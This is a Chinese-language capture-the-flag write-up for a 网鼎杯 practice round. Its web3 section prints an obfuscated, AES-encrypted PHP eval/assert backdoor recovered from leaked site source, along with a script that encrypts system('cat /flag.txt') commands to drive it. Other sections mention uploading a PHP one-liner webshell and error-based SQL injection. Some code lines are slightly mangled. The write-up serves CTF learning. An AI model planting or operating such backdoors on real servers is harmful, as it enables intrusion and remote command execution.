~/home/综合归档/网鼎杯模拟赛 ...

网鼎杯模拟赛

web

签到

web1

上传 php一句话木马

web2

sql 注入注入点在消息通知中,找到id参数。数字型注入直接找到order by 4
直接报错注入。

web3

web3 是唯一一道有难度的题目,可以看到一开始给了一个页面。显示的是一个系统代码被修改了。我们扫描目录扫描到wwwroot.zip。直接把系统源码下载下来。

其实我们仔细分析一下这个提示,他就说因为被篡改了所以说网站紧急关闭。同时把系统代码备份了。此时我们考虑如果说我们没有交互界面我们无法进行操作,那么肯定是有一些站点没有关闭。
遍历所有文件,发现只有一个文件返回了一个字符串,直接审计这个文件。

describedssTest.php<?php
error_reporting(0);
header("Content-type: text/html; charset=utf-8");
$p8 = "3b7430adaed18facca7b799229138b7b";
$a8 = "TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=";
$d8 =
    "TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09";
$v8 = "0329647546905494";
function e($D, $K)
{
    $cipher = "aes-128-cbc";
    $encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS["v8"]);
    $result = base64_encode($GLOBALS["v8"] . $encrypted);
    $result = base64_encode($result);
    return $result;
}
function d($D, $K)
{
    $cipher = "aes-128-cbc";
    $decodedData = base64_decode(base64_decode($D));
    $encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
    $decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS["v8"]);
    return $decrypted;
}
$a8 = trim(d($a8, $p8));
ob_start();
$a8(trim(d($d8, $p8)));
$O = ob_get_contents();
ob_end_clean();
echo e($O, $p8);
 ?>

仔细分析一下逻辑,其实只看下面的一些语句, 就知道先 解密

$a8 并且解密出来是assert直接拼接执行,同时我们又解密是$d8,出来是一个木马。直接利用木马执行,里面需要注意eval每次只执行一层,同时需要注意'' 需要被\转义。同时需要注意20241026是md5两次才能等于3b7430adaed18facca7b799229138b7b

d8解密出来的木马

@eval("if(md5(@\$_GET['id'])===\$p8){@eval(trim(d(\$_POST['d'],\$p8)));}")
payload生成
pherror_reporting(0);
header('Content-type: text/html; charset=utf-8');
$p8 = '3b7430adaed18facca7b799229138b7b';
$a8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=';
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09';
$v8 = '0329647546905494';
function e($D, $K){
$cipher = 'aes-128-cbc';
$encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']);
$result = base64_encode($GLOBALS['v8'] . $encrypted);
$result = base64_encode($result);
return $result;
}
function d($D, $K){
$cipher = 'aes-128-cbc';
$decodedData = base64_decode(base64_decode($D));
$encryptedData = substr($decodedData,
openssl_cipher_iv_length($cipher));
$decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
return $decrypted;
}
$a = "eval ('system(\'cat /flag.txt \');
');
";
echo $c = e($a, $p8);
?> ?>
返回结果解密
<?php$p8 = '3b7430adaed18facca7b799229138b7b';
$v8 = '0329647546905494';
function d($D, $K){
$cipher = 'aes-128-cbc';
$decodedData = base64_decode(base64_decode($D));
$encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
$decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
return $decrypted;
}
echo d("TURNeU9UWTBOelUwTmprd05UUTVOREZYVW1wMFpuUTFTblJyV1VGbVV6a3JOa042ZWs4MVQxSnNURWxUWTJoeWVYSlNaRU5GWmxGc2FHOVRVamwyY0hwQ2FXNVVTMEpSTkhoU00wczNXWFk9", $p8);
?> ?>

misc

日志分析

直接搜索{